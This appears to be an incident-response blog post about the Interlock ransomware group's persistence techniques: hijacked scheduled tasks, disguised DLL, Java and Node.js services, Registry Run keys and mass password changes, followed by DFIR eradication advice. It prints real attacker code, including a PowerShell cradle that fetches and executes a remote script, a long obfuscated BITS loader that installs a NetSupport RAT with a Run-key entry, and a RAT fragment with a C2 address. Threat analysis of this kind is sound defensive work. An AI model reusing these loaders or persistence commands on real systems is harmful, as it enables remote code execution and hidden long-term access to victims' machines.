Persistence Techniques: Modern threat actors are deploying large-scale and varied persistence methods across environments to add pressure to recovery efforts, slow forensic response, and increase likelihood of maintaining persistence.
Case Highlight: The Interlock ransomware group utilized over 40 unique persistence methods across more than 100 hosts, complicating complete eradication efforts.
Actionable Insights: Understanding these sophisticated tactics is vital for enhancing incident response strategies and safeguarding critical infrastructure.
Persistence has always been a core component of a threat actor’s playbook -- target a handful of hosts, install a backdoor out of plain sight to maintain access in the event of disruption and avoid detection. For forensics operators, this leads to the proverbial "needle-in-a-haystack" style approach of trying to hunt down core assets during timeframes of interest for potential footholds. However, we're starting to see a shift in how threat actors use persistence.In a recent ransomware case involving the Interlock ransomware group, nearly 25% of the environment was impacted by 1 of 40 different variants of persistence spanning scheduled tasks, registry keys, and services. This approach can quickly overwhelm recovery teams looking to restore business operations, add pressure to forensics teams that are rapidly trying to contain the environment and restore business operations, and may increase the likelihood that a persistence method on a host without a forensic collection or EDR agent goes unnoticed.In this blog, we'll take a look at the different persistence methods used by Interlock, and a measured incident response approach to accelerate eradicating threats employing this method to more rapidly restore client's to business operations.
Threat actors establish persistence through a range of techniques, not only to maintain their foothold throughout the compromise period but, in some cases, such as with Interlock, to maintain persistence even after organizations have returned to business as usual. The majority of methods observed were through scheduled tasks and disguised malicious services, through a variety of file types and techniques.
We observed that more than half of the identified unique persistence mechanisms involved scheduled tasks. This included the use of Java-based backdoors, Node.js scripts, Cloudflare tunneling, and disguised DLL execution. A few examples of the activity observed can be seen below.
The ScheduledDefrags task was configured to use rundll32.exe to execute a malicious DLL masquerading as sccm.log, which established a command-and-control (C2) channel to a threat actor–controlled host. This technique provided persistence while evading detection by imitating the legitimate ScheduledDefrag system task.
Task Name: \Microsoft\Windows\Defrag\ScheduledDefrags
C:\Windows\System32\rundll32.exe
C:\Users\_[Redacted]-backup\AppData\Roaming\sccm.log
The legitimate Windows task \Microsoft\XblGameSave\XblGameSaveTask was modified to execute node.exe with wmstupone.txt, a Node.js script that established a C2 channel. This represents another tactic observed during the engagement to maintain persistence while evading detection.
Task Name: \Microsoft\XblGameSave\XblGameSaveTask
C:\Temp\node.exe
C:\Temp\wmstupone.txt
The task GoogleUpdaterTaskSystem... was configured to execute node.exe with googlenode.txt, a Node.js script designed to establish a C2 channel. In this case, the script was placed within a directory associated with ShoreTel’s legitimate telephony software suite, likely to evade detection by blending into a trusted application path.
Task Name: GoogleUpdaterTaskSystem132.0.6833.0{FC2A638D-CAB7-47A2-A088-CA98404027BF}
C:\Program Files (x86)\Shoreline Communications\ShoreWare Remote Server\wserver\node.exe
C:\Program Files (x86)\Shoreline Communications\ShoreWare Remote Server\wserver\googlenode.txt
The legitimate ProactiveScan task was modified to invoke a PowerShell download cradle that connected to a trycloudflare.com domain. This enabled the attacker to maintain persistence by remotely executing scripts from their controlled infrastructure.
Task Name: ProActive Scan
powershell.exe -NoProfile -w H -c "$r=iwr 'https[:]//sun-insurance-estimated-jurisdiction[.]trycloudflare[.]com' -UseBasicParsing;$s=[Text.Encoding]::UTF8.GetString($r.Content);iex $s"A significant number of the identified persistence mechanisms leveraged Windows Services to execute malicious binaries upon system startup. Several examples of this activity are provided below. The Win32.dll file is a malicious DLL registered as a Windows service. Once loaded, it facilitates ongoing communication with attacker-controlled infrastructure, functioning as a persistent backdoor on the system.
"C:\Windows\system32\rundll32.exe" C:\Windows\Temp\win32.dll start
Despite its .ps1 extension, CheckFolder.ps1 is a disguised DLL, identifiable by its MZ header. Its true purpose is to maintain remote access by routinely connecting to a C2 server, enabling the attacker to issue commands and exfiltrate data under the guise of a benign PowerShell script.
"C:\Windows\system32\rundll32.exe" C:\Scripts\CheckFolder.ps1 start
Disguised as a benign deployment component, veeamDeploymentSvc.jar is a malicious Java archive set to run as a service. It was designed to covertly establish a C2 channel, granting remote control capabilities while blending in with enterprise software.
java.exe -jar C:\temp/veeamDeploymentSvc.jarThe threat actor leveraged the Registry Run key to establish persistence within the compromised environment. Specifically, the Background Intelligent Transfer Service (BITS) was employed to download malicious archive files from attacker-controlled staging domains. Upon extraction, the payload, client32.exe, a NetSupport Remote Access Tool, was added to the Registry Run key to execute at system startup.
$rkhKs='https://andrixdesign[.]com/kzz/c4ub.zip'; $r4i0aO2=gCm ExPAND-aRchive -ERroRactiOn sILENtlyCONTInUE; $tAzDM3G='0YEHK.zip'; $JxLRSsu='0neNote'; $yMIQvFY='https://andrixdesign[.]com/kzz/c1ub.zip'; [NET.seRviCEpOinTmAnageR]::SeCURiTyPRotOcoL = [NET.SecUritYpROTOCoLTyPe]::TLS12; $xV9GW='8lf8Nz.zip'; cHDir $EnV:APPdATA; $gXBHN='https://andrixdesign[.]com/kzz/c3ub.zip'; $hs0jp='8x2ORG1p.zip'; $3kyFB='tfoTTAz.zip'; $89ZOqF=GeT-cOMmand STarT-BiTstransFer -eRroRACtIOn SIlENTLYCoNtiNuE; $iZvbcU8='https://andrixdesign[.]com/kzz/c2ub.zip'; $Tdb1LJi=jOiN-pAtH -path $EnV:appdaTa -ChildPaTH $3kyFB; $fkrT24xB=join-PaTh -path $ENv:aPPdATA -CHiLDPAtH $xV9GW; $tIN8p6=$EnV:APPDAta, $hs0jp -JOIn '\'; $7LbeS=$ENv:aPPdATA, $tAzDM3G -joiN '\'; $0vJiRU=$env:ApPDAta+'\'+$JxLRSsu; $nvEF3="bitSaDmIn.Exe /tRAnsFEr cxVpi /DoWNlOaD /pRiorITY noRMal $iZvbcU8 $Tdb1LJi"; $5Hb8u="BitsaDMiN.EXe /TraNsfeR 2rb7ljAs /DownLOaD /pRIOrity NoRmAl {0} {1}" -f $yMIQvFY, $7LbeS; $mNHWh='BitsaDMiN.EXe /TraNsfeR 2rb7ljAs /DownLOaD /pRIOrity NoRmAl '+$yMIQvFY+' '+$fkrT24xB; $fmIHy="BitSADmIn.eXe /transfer XWI63 /DoWnLOaD /prIoRItY nOrMal {0} {1}" -f $gXBHN, $tIN8p6; IF ($r4i0aO2) { if ($89ZOqF) { sTArt-bITsTRAnSfEr -SOurCE $rkhKs -dEStINAtion $7LbeS; STArT-BiTStraNsFeR -SOurCE $gXBHN -DEstInatIOn $tIN8p6; StarT-biTsTrAnSFER -sOuRce $iZvbcU8 -dEsTInAtioN $Tdb1LJi; STaRt-biTStRAnSfER -souRCE $yMIQvFY -DeSTinatIon $fkrT24xB; } ELse {iNvoKE-EXprEssiON -CoMmaND $fmIHy; iNvoKE-EXprEssiON -CoMmaND $5Hb8u; iNvOkE-eXPResSIoN -coMMand $mNHWh; iNvoKE-EXprEssiON -CoMmaND $nvEF3; } eXPaND-arCHIvE -Path $fkrT24xB -dESTinATiOnpath $0vJiRU; EXpand-aRCHIVe -PAth $7LbeS -dESTInaTIOnpaTh $0vJiRU; eXPAnD-ArcHIve -PAtH $tIN8p6 -dEsTiNaTioNPAth $0vJiRU; expANd-aRChiVE -PaTH $Tdb1LJi -dEsTiNaTiONPATh $0vJiRU; rD -PaTH $7LbeS; rEMoVe-itEm -paTH $Tdb1LJi; rD -paTH $tIN8p6; rD -pATH $fkrT24xB; } elSE { $VQwHwmqE='https://andrixdesign[.]com/kzf/'; nI -path $ENv:APpdAtA -nAME $JxLRSsu -iTemTYPE 'directory'; $2w7SnNYX=@('client32.exe', 'pcicapi.dll', 'nskbfltr.inf', 'msvcr100.dll', 'client32.ini', 'NSM.LIC', 'AudioCapture.dll', 'HTCTL32.DLL', 'remcmdstub.exe', 'PCICHEK.DLL', 'PCICL32.DLL', 'TCCTL32.DLL', 'nsm_vpro.ini'); iF ($89ZOqF) { $2w7SnNYX | FoReACh { $I8YZ2qOA=$VQwHwmqE+$_; $0zk0LjF=$0vJiRU+'\'+$_; StARt-BiTSTrANSFer -SoUrCe $I8YZ2qOA -dESTiNAtion $0zk0LjF; };} elsE { $2w7SnNYX | FOREach-ObjECT { $I8YZ2qOA=$VQwHwmqE+$_; $0zk0LjF=$0vJiRU+'\'+$_; $PMxf4xeF='bITsADMIn.eXE /tRaNSFEr GNuSoqmn /dowNLoAD /PRIoRITy nORmAl '+$I8YZ2qOA+' '+$0zk0LjF; INVOkE-EXpREssiON -command $PMxf4xeF;}; }; }; $FKnpvj3k=geT-itEM $0vJiRU -fORce; $FKnpvj3k.atTrIBUtes='Hidden'; cd $0vJiRU; $x6h7cc=$0vJiRU, 'client32.exe' -JoiN '\'; starT client32.exe; New-iTEmPRoPerty -patH 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -nAME $JxLRSsu -vaLUE $x6h7cc -pRopeRTyTYPE 'String';Remote Access Trojans (RATs) were deployed via heavily obfuscated PowerShell commands, crafted to bypass detection controls and maintain access through a designated C2 server. An example of such activity is shown below:
# Initialize XOR key array
$xorec = New-Object byte[] 50
For ($i = 0; $i -ne 50; $i++) { $xorec[$i] = $i }
# Set C2 server IP and port
$ipaddress = "157.230.182.115"
$dport = 443
# Define helper function for encryption/decryption
function Encrypt-Buffer {
param($key, [int]$keyLength, $buffer, $start, $size)
for ($i = 0; $i -lt $size; $i++) {
$buffer[$start + $i] = $buffer[$start + $i] -bxor $key[$i % $keyLength]
}The threat actor was observed changing passwords for 544 user accounts within the client’s environment. This activity was intended to secure long-term access, impede recovery efforts, and delay incident response by locking out legitimate users.
The mass distribution of persistence observed in this case highlights the need for a comprehensive and methodical Digital Forensics and Incident Response (DFIR) approach. The widespread deployment and diverse persistence and evasion strategies observed in this case highlights the need for full endpoint visibility, comprehensive telemetry collection, continuous monitoring, and robust forensic processes. Without these capabilities, organizations risk missing deeply embedded persistence mechanisms, allowing attackers to maintain long-term access and cause further damage.
To detect and eliminate persistence at this scale, we conducted a methodical sweep of the environment using both proactive and reactive investigative techniques. This included analyzing Windows Services and registry key modifications, enumerating scheduled tasks, reviewing command histories in both Command Prompt and PowerShell, and examining Master File Table (MFT) entries to detect anomalies. We approached each persistence type systematically, identifying file types (e.g., JARs, DLLs, Node.js, etc.) to drill into across across the environment. Hash blocking and Indicators of Attack (IOAs) were deployed to isolate known malicious binaries, while deep dives on high-risk hosts helped surface less obvious footholds. On-Demand Scans (ODS) were used to uncover hidden artifacts, and hosts were safely rebooted under containment to trigger latent scheduled tasks.
The Interlock Group’s tactics highlight the increasing sophistication of modern threat actors, who are adapting their methods to counteract the investigative techniques employed by responders, and enhancing their ability to evade detection. As incident responders, we must move beyond traditional ways of thinking and adopt a proactive and flexible approach to detection and response. EDR telemetry plays a crucial role in investigations, providing valuable visibility into suspicious activity in real-time. When combined with scalable forensic tools, appropriate preventative controls, and analytical processes, it enables large-scale investigations to be conducted at speed with the appropriate level of risk reduction, ensuring that layered persistence mechanisms are identified and fully eradicated from compromised environments.
At MOXFIVE, we continuously analyze emerging threats and work to develop strategies that help organizations defend against these evolving attack techniques. Persistence is one of the most challenging aspects of incident response, and without proper forensic investigations and robust processes, organizations risk leaving the door open for threat actors.
Have you encountered similar persistence techniques in your investigations?
MOXFIVE provides the clarity and peace of mind needed for attack victims during the incident response process. Our platform approach enables victims of attacks to work with a Technical Advisor who provides the expertise and guidance needed in a time of crisis, and facilitates the delivery of all technical needs required, consistently and efficiently.
Learn More
With experience on the front lines responding to incidents daily, MOXFIVE Technical Advisors have the unique ability to connect the dots between business, information technology, and security objectives to help you quickly identify the gaps and build a more resilient environment.